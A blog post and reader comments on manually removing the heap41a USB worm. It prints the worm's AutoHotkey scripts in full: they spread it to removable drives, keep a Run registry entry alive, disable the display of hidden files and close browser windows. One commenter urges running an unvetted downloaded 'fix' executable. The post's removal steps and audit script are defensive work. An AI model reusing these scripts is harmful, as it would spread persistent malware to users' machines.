w32.USBWorm: let's remove this worm manually
May 16
Yesterday my friend Vinay gave me a USB disk and asked me to copy some movies and music onto it. I took it home, plugged the USB drive into my system and scanned it with NOD32. It detected some viruses, which it removed successfully; little did I know that another worm had gone undetected and was about to infect my system. I double-clicked the USB drive and nothing happened. Hmm, strange. I right-clicked, opened the USB drive and found it had no content. The Autoplay entry appears only if an Autorun.inf file is present in the root of the drive. I didn't think much of it and closed the window, planning to copy the data onto the drive later.
I wanted to check my mail, so I ran my beloved browser Firefox. It opened, and within a couple of seconds a message box popped up that said "I DNT HATE MOZILLA BUT USE IE OR ELSE…" with the title "USE INTERNET EXPLORER YOU DOPE." I was like, what? It also terminated Firefox. This is when I remembered the Autoplay option on the USB drive. I had to open Internet Explorer and Google this text, and found that the worm's name is w32.USBWorm (it was obvious by now). The next step was to search for a removal tool and, to my amazement, there was none available! Nor could I find any information on how to remove it. I decided to try removing this worm myself. I tried opening Orkut and, bang, another surprise. This is the message it popped up: "ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??" Now this was pissing me off. I had no other option but to remove this worm from my system. I pressed Ctrl+Alt+Del and found nothing suspicious there.
Let's see what this worm does
It runs an exe file named MicrosoftPowerpoint.exe, which is located on the USB disk; the autorun.inf launches this file when the drive is double-clicked. Once this program runs, you are infected. It stops hidden folders from being shown, keeps its process running in memory, makes the worm start with Windows and pops up those annoying messages. This worm doesn't destroy any system files; it just infects other USB drives and spreads to new hosts.
It's time to KO the worm
I have PE Tools installed on my PC, so I ran it to look at the running processes. I went through all the processes and found that svchost.exe was the one responsible. Where PE Tools helped me was that this svchost.exe was running from the location C:\heap41a. So this is where the worm resides; interesting, so deleting the folder should do the job. But it was not so easy: whenever I terminated this svchost.exe from the process list, it would start again. So I had to boot my XP into safe mode. Why safe mode? Because in safe mode Windows loads only the minimum required drivers and doesn't load any user processes, which means the worm is not started with Windows.

Now I looked for the folder C:\heap41a, but it was hidden. I went to Tools > Folder Options, selected "Show all files and folders" and pressed OK. I refreshed C:\ only to find that it still wouldn't show any hidden folders. I went back to Tools > Folder Options and found that the "Show all files and folders" setting had been reset. Now how do I see the contents? What I did was go to Windows Search, tick "Search hidden files and folders" in the advanced options, and give svchost.exe as the search keyword. Bang, it found it, so I opened the folder to find that this file was not alone. The other files in this folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt and std.txt. Let's see the contents of these text files.
[offspring] – Blank Folder
2.mp3 – A laughing sound
Icon.ico – A blank Icon file
reproduce.txt
#notrayicon
#persistent
; Load the drive letters listed in driveList.txt into Array1..ArrayN
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
; Every 5 seconds run the "reproduce" label below
settimer,reproduce,5000
return

reproduce:
; Copy the offspring folder onto every removable drive that is ready
Loop %ArrayCount%
{
    element := Array%A_Index%
    driveget,data,Type,%element%:\
    ifequal,data,Removable
    {
        driveget,data1,status,%element%:\
        ifequal,data1,Ready
        {
            FileCopydir,C:\heap41a\offspring,%element%:\,1
        }
    }
}
; Re-create the "winlogon" Run value if it has been removed or changed
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return
svchost.exe
This is the culprit: the file responsible for all the annoying pop-ups. Judging by the #persistent and #notrayicon directives and commands such as settimer, WinGetActiveTitle and ahk_class, the .txt files are AutoHotkey scripts, and this svchost.exe is the script interpreter that runs them (std.txt below launches it with a script path as its argument).
script1.txt
#persistent
#notrayicon
; Every 2 seconds run the "ban" label below
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
; Any window whose title mentions Orkut or YouTube is closed, with a laugh and a taunt
ifinstring,ed,orkut
{
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
}
ifinstring,ed,youtube
{
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
}
; Firefox is closed whatever site it shows
ifinstring,ed,Mozilla Firefox
{
    winclose %ed%
    msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
    return
}
; For Internet Explorer the title may not reveal the site, so the text of
; its edit controls (address bar fields edit1..edit4) is inspected instead
ifwinactive ahk_class IEFrame
{
    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
}
return
std.txt
#notrayicon
#singleinstance,ignore
; Force the Folder Options "Show hidden files" setting off by keeping
; SHOWALL\checkedvalue at 2 (which equals DefaultValue, i.e. "do not show")
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
; Start the other two scripts with the renamed interpreter
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
These files gave away everything this worm does; after reading the scripts I found out that this worm also hates YouTube, lol. The most important information they gave was the registry keys it modifies.
These are the lines (from std.txt) responsible for the hidden-folder problem I faced earlier:
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Now to rectify this, go to Start Menu > Run and type regedit. In the Registry Editor browse to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and reset the CheckedValue entry (the checkedvalue the script writes) back to 1 from 2. Now you can change the settings in Folder Options again. Next, delete the folder C:\heap41a and remove every value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run that mentions heap41a.
Now the infection is removed 100%. Before you are done, make sure you format the USB drive so that it doesn't infect other systems too.
All the best. Until a tool is out for this worm, you can follow this method to remove w32.USBWorm.
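As an added example (not from the original post or from the worm's files), here is a read-only PowerShell audit for the indicators described above: the winlogon value under policies\Explorer\Run, the SHOWALL CheckedValue tampering, the hidden C:\heap41a folder, an svchost.exe running from outside System32, and the autorun.inf / MicrosoftPowerpoint.exe pair on removable drives from the "what this worm does" section. It assumes PowerShell is available on the affected Windows machine and is run from an administrator prompt; the function names are my own.

```powershell
# Added example, not part of the original post or the worm's own files.
# Read-only audit for the indicators described in the post; it reports and
# changes nothing, so findings can be reviewed before the manual removal steps.
# Assumption: PowerShell on the affected Windows host, run as Administrator.

$WormDir     = 'C:\heap41a'
$RunKey      = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run'
$ShowAllKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
$DropperName = 'MicrosoftPowerpoint.exe'

function Test-Heap41aHost {
    $findings = @()

    # 1. Persistence: reproduce.txt keeps rewriting a 'winlogon' value under
    #    policies\Explorer\Run that points at C:\heap41a\svchost.exe.
    $run = Get-ItemProperty -Path $RunKey -ErrorAction SilentlyContinue
    if ($run) {
        foreach ($p in $run.PSObject.Properties) {
            if ($p.Value -is [string] -and $p.Value -like '*heap41a*') {
                $findings += "Run value '$($p.Name)' = $($p.Value)"
            }
        }
    }

    # 2. Folder Options sabotage: std.txt forces SHOWALL\CheckedValue to 2,
    #    so "Show hidden files" silently resets; the healthy value is 1.
    $showAll = Get-ItemProperty -Path $ShowAllKey -ErrorAction SilentlyContinue
    if ($showAll -and $showAll.CheckedValue -ne 1) {
        $findings += "SHOWALL CheckedValue is $($showAll.CheckedValue) (expected 1)"
    }

    # 3. Payload directory. -Force lists the hidden folder Explorer would not show.
    if (Test-Path -LiteralPath $WormDir) {
        $names = Get-ChildItem -LiteralPath $WormDir -Force | ForEach-Object { $_.Name }
        $findings += "$WormDir exists, contains: $($names -join ', ')"
    }

    # 4. A process named svchost.exe whose image is outside System32 is the
    #    renamed script interpreter, not the Windows service host.
    $sysdir = Join-Path $env:SystemRoot 'System32'
    foreach ($proc in @(Get-WmiObject Win32_Process -Filter "Name='svchost.exe'")) {
        if ($proc.ExecutablePath -and -not $proc.ExecutablePath.StartsWith($sysdir, 'OrdinalIgnoreCase')) {
            $findings += "svchost.exe PID $($proc.ProcessId) runs from $($proc.ExecutablePath)"
        }
    }
    return $findings
}

function Test-RemovableDrives {
    $findings = @()
    # DriveType 2 = removable: the only drive type reproduce.txt copies onto.
    foreach ($disk in @(Get-WmiObject Win32_LogicalDisk -Filter 'DriveType=2')) {
        $root = $disk.DeviceID + '\'
        $inf  = Join-Path $root 'autorun.inf'
        if (Test-Path -LiteralPath $inf) {
            # Report which executable the autorun.inf would launch on double-click.
            $launch = Get-Content -LiteralPath $inf -Force |
                      Where-Object { $_ -match '^\s*(open|shellexecute)\s*=' }
            $findings += "$root has autorun.inf: $($launch -join '; ')"
        }
        if (Test-Path -LiteralPath (Join-Path $root $DropperName)) {
            $findings += "$root contains $DropperName"
        }
    }
    return $findings
}

$all = @(Test-Heap41aHost) + @(Test-RemovableDrives)
if ($all.Count -eq 0) { 'No heap41a indicators found.' } else { $all }
```

Run it before and after the manual steps: an empty result after cleanup confirms the Run value, the CheckedValue setting, the folder and the rogue process are all gone.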

Hey Allwin. My system does not start in safe mode but simply reboots if safe mode is selected. So I had to start it normally. But as you said, the heap41a folder is hidden. But I typed c:\heap41 in the Windows address bar and, surprise surprise… I get the folder, but guess what? All its contents are visible! So I deleted all of it and moved the svchost file to the quarantine folder. Then I followed your instructions. But here is the problem: the worm is still there :(
Please help me.
Hey Roy… did you check if the file has replicated in the heap41a folder? If that is the case then the worm will live on… try to remove the entry in the registry for winlogon in Explorer\Run, and then use a tool to delete the svchost.exe from the folder. A tool like HijackThis should help. Use the option to delete the file on reboot… and please make sure before doing that… cut the MicrosoftPowerpoint.exe and the .inf file from the USB drive to the Recycle Bin and empty the bin. Then try to delete the file, otherwise when you plug in the USB the worm is back!!!… this should take care of the issue.
AWESOME POST DUDE!!!
It helped a lot..
-Cheers
Ali
Hi Allwin Samuel,
Thanks for your detailed description of how to remove the heap41a virus. I have removed the virus from my PC, but still I can't make any changes in Folder Options, meaning hidden files are not visible. Does it mean the virus still exists on my PC?? To remove heap41a, I typed c:\heap41a in the Run command and deleted the contents of that folder. Please let me know if any solution is available without formatting the PC.
Hi Jeba, thanks for the information.
As soon as I got infected with this worm I could find out that the culprit process was svchost.exe; what I could not find out was its location. I thought it was the system file that had got corrupted and tried repairing it, with funny results.
Now that I know the location of the file, it's easy.
As I found it difficult to use Orkut, I installed another copy of XP on another partition. Now I can delete the folder from this OS, as it is not affected by the worm. This should work. So those who cannot delete it, try deleting from another OS, probably a live distro of Linux like Knoppix, or use a DOS-based boot CD like Hiren's Boot CD, UBCD or UBCD4Win.
Also I could see from most responses that many people have been experiencing problems even after deleting the folder. This is most probably because the registry entries have not been deleted. So open the Registry Editor, search for "C:\heap41a" and delete all found entries.
Now all problems must be cleared. Let me check myself.
I did all things I thought I should do and it worked.
Now my system is absolutely alright.
The key in registry that I could find was in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
inside that key there was a value with
Name : winlogon
Data : C:\heap41a\svchost.exe C:\heap41a\std.txt
I removed the value and now I can browse Orkut with ease.
Thnx to Jeba for providing me the location
THANXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX A LOT Mate!!!!!!!!!!!!!!!!!!!!!!!!!
U ROCK!!!
thanks a lot for the friendly info dude… you bailed me out… though Avast detects the trojan… it's unable to do anything about it… can't even delete it or repair the system!
PHEW Thanx mate
oh man… I suck!! I found the worm the first day it infected my comp… it actually makes multiple copies of itself, and hey, that's not all… I guess it allows other viruses to infect your comp as well! Anyway, what happened… I found heap41a… but then renamed it, deleted all the files except autohotkey or svchost.exe and then tried moving the file to another location!! It moved… and now I can't find it!!!
btw for people unable to do this… for the time being… there is a way around this… just type Ctrl+Alt+Del, and then open your IE, type in orkut.com, now when the window saying 'orkut is banned' pops up… go back to the Task Manager and right-click on that window, you'll find 'Go To Process', click on it, and it will lead you to one svchost process in the process list, right-click and End Process… voilà… you can browse Orkut… but Jeba… thanks for this buddy!!
Thanks a lot . That’s really awesome Man!
Thanks It helped me remove the virus
Hi Allwin:
My comp is also infected by this damned worm…
I am running Windows XP Professional Service Pack 2. I have to warn you that I am only partially Windows XP literate.
I tried following your instructions while running Windows in Safe Mode, but when I got to your instruction:
"In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the "Checked all" key reset it back to 1 from 2"
I could not find the "Checked all" key in the list.
All I see is:
Checked Value REG_DWORD 0x00000000 (0) and
Default Value REG_DWORD 0x00000002 (2)
and seven other entries.
To follow your instruction, I need to find the "Checked all" key and reset it back to 1 from 2.
Help!
Thanks in advance…
Hi Jeba,
Thanx dude…. It really helped me a lot…..
My friend's PC was infected by this virus…… Now it's working fine.
Thanx a lot….
I am not able to fix the problem.
In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, in the right-hand box there are values for checked value (0) and default value (2). Which one has to be changed? After changing checked value to 1 I am able to see the hidden files, but still there is no heap41a found on searching.
Please help me out.
I have the same problem as Amit…
Help us!
Hello DecNaz and Amit..
I suggest you search for this worm in this folder:
"C:\Documents and Settings\WINDOWS-USERNAME\Local Settings\Temp\MicrosoftPowerpoint"
It has sometimes been found to be residing in this folder too… Happy hunting.
That's all I can say! I couldn't even search for the solution, as this worm detects any occurrence of the word orkut and kills that window! Your window opened, and later I followed the guidelines on my GPRS to clean my laptop!
Glad you found this tutorial useful. Don't forget to share it with your friends and buddies so even they can take advantage of this tutorial.
Very very thanks!!!
It is very useful to me because my PC was infected by browsing a USB pendrive.
My systems network application also stopped
I had to reinstall my OS
Why?
Here’s what i think is a simpler way to get rid of the trojan: http://arsetard.blogspot.com/
By the way, i’ve used your way to clean these trojans for over 50 times after which i discovered my method. THanks man.. many cheers!
same happened to me !!! thanks 4 the support .. however from when can the usb drive be infected .. or any particular website
The usb drive can be infected by inserting the usb drive in already infected system.
Hey Thnxs….
My friend's PC was infected by this virus…… I removed the virus, thanks for your help….. So now it's working fine……..
hey Dude,
I can't open regedit from Run. After I typed it and pressed Enter it produced a sound but nothing happened; the Registry Editor did not open. Help me out please… :(
Thanks a Billion buddy!! I was spending a whole 2 days in vain until I saw your post…
hai
pls help me
I can't access my Orkut account on my PC. When I write the address in the URL bar there appears a message that
orkut is banned u fool, its not don by the administator , guess who did, MUHAHAHA
so I can't get in touch with my friends abroad. Please find a solution for me.
with regards shambu_777
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
CheckedValue = 1
DefaultValue = 2
That fixed the hidden folder issue with me.
Dude, you seem more intelligent than the others.
I have manually tried to stop the worm and I succeeded.
The way you say, I have already explored.
That way does not remove the scripts.
1st
You can access the hidden folder by typing in the address box:
C:\heap41a
Use HijackThis, preferable to PE Explorer.
End the SVCHOST.exe process that is not the system one.
Delete the contents of heap41a as found above
(if you end the system one, then you will suck and you will come to know why).
50% problem solved.
DON'T DON'T DON'T open any folder, and close all open ones.
Once Ended,
_______________________________________________
Method 1
Run Nero StartSmart, not from any folder but from the Start menu or desktop. Take care of this: not from any folder.
Now go to Task Manager and end EXPLORER.exe and SVCHOST.exe again (the SVCHOST.EXE that is consuming the least memory).
Why?
The script this guy is showing is autorun from autorun.inf files in all the folders as you navigate through them or open them,
and again the virus is activated even when its main protecting process has been ended.
Now, once you have ended explorer,
Burn disc in Nero.
Navigate through all the folders via nero, from drive to inside, all the folders.
U will see an autorun.inf file in all folders.
delete them all
________________________________________________
Method 2
If you have Kaspersky 7.0.0.121 or above, then do the virus scan and disable iChecker and iSwift
and delete all the infected autorun files
_________________________________________________
After the above methods:
Go to registry editor and find “heap”
delete all the values, keys
find “microsoftPowerPoint” delete all keys
find “MUI” in shellnoroam and delete all keys
You are done.
hello
I did as you directed… but when I reached 'showall' in the Hidden section, there is no key named 'checked all'… please help me… this worm is really bugging me… please direct me what to do now… and also after removing this worm how do I format the USB drive… please help fast…
thnk u
Hii ,
Excellent post, man! Quite descriptive…
To all those novice guys out there who are finding problems with editing the registry to find the virus directory and delete it…
There is an easy solution: as you know the location of the virus, use DOS to delete it.
Go to the Run prompt and type cmd there.
The DOS prompt will open.
Use cd to change directory:
cd dir-name // to change directory to dir-name
dir // to view the contents of the directory
Go to c:\heap41a
Then, using commands like deltree, del or rmdir, delete the dir… but before that you have to terminate the svchost.exe which is running from this dir.
For that someone has given a very elegant, practical solution…
Open Task Manager by pressing Alt+Ctrl+Del.
Try opening Orkut in your IE and when the pop-up comes, go to Task Manager > Applications, right-click and click on Go To Process. It will tell you which svchost.exe to end.
Once it is done you can delete C:\heap41a by using DOS commands.
The problem will be solved.
Dear Allwin Samuel Jeba,
I was not affected by this virus, but was searching for a removal tool to help my friend remove it. Then I saw a plagiarised post in the Digital Inspiration forums here:
http://www.labnol.org/forums/topic/help-youtube-is-banned-hack
In that post a part of your above article is copied word for word without credit, by a forum user. It starts like
“It’s time for dissestion
I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was svchost.exe was running from a location C:\heap41a . So this is where the worm resides. Interesting, so deleting the folder would do our task. But it was not so easy, as I terminated this process …….”.and goes on.
Please take note of it.
Moitheensha
Hello Moitheensha,
I really want to thank you for reporting this. I will contact the owner of the blog and get it removed or get proper credentials for it.
Thank You
Hi,
I value your effort and that's why I reported it. The owner of that blog is one of the influential bloggers from India and he may not be aware of the whole matter. Let's hope he will show justice to your time and hard work.
Thanx for the removal tip anyway,
moitheensha
Thanks Allwin, it was a great help for me, as I am running a cyber cafe and all my PCs were affected by that worm.
Thanks man for this great help….
I don't know much about computers… even then I did it because of your easy tutorial…… thanks……………
Well, I had followed the first step of deleting the contents in c:\heap41a but could not open regedit or msconfig; I also found that I could not open a command prompt in safe mode, but it opens in "Safe Mode with Command Prompt" only. Please advise what else is to be checked… using Win XP Pro SP2…..
Thanks a lot for the detection of the script… but man, I must admit someone sure used his head well creating the script.
I guess it's an admin trying to restrict his LAN members from accessing the particular sites.
Thanks, finally after a long time I found the way to remove microsoftpowerpoint.exe / svchost.exe from my pendrive.
Thanks, even I was suffering from the Orkut banned problem but now it's rectified. Thanks a lot.
You deserve a great round of applause.
It's a worm infection (maybe adware or spyware).
For removal of that… run any anti-spyware software on your machine.
Or to resolve your problem temporarily, press Ctrl + Alt + Del and end the svchost.exe which is not related to any system process.
Here is the fix for the Orkut, YouTube, Firefox Blocker (Heap41a / win32.USBWorm).
This tool can be used to remove the Blocker worm as well as prevent the worm from further infecting the same machine.
Or take a look here —
http://slynux.org/downloads/Worm-fix.exe.zip (posting external link)
Usage instructions:
1) Download the fix and run it on the infected machine.
2) It will ask for a re-login.
3) After logging in again, run the fix again. The worm will be removed successfully.
IT REALLY WORKS…TRUST ME, IM TELLING U BECAUSE I’VE TRIED IT ALREADY. NO NEED TO GO INTO SOME LENGTHY PROCESS…JUST UNZIP AND RUN IT, IT WILL BE GONE IN SECONDS!!!
I couldn’t understand some parts of this article w32.USBWorm lets remove this worm manually, but I guess I just need to check some more resources regarding this, because it sounds interesting.
Hi Allwin Samuel Jeba,
I have done all the steps and have removed the files…
But the problem is that the folders I explored during this process have been hidden and an exe file with the folder's name is present instead… after changing the registry entry… I am still not able to view those folders…
Please help me out…
i dunno, this worked for me.
Just edit the properties of the C:\heap41a folder and remove all users (Everyone, SYSTEM, your user), and the worm won't be able to execute anything in the folder.
you can later, remove its contents.
how will you operate that HijackThis
Sushmita or others, please tell me how you operated that HijackThis software!
hi…
very good job……….thanx to u……
Thx a lot dude ..
U’re a life saver …
Good Work !!!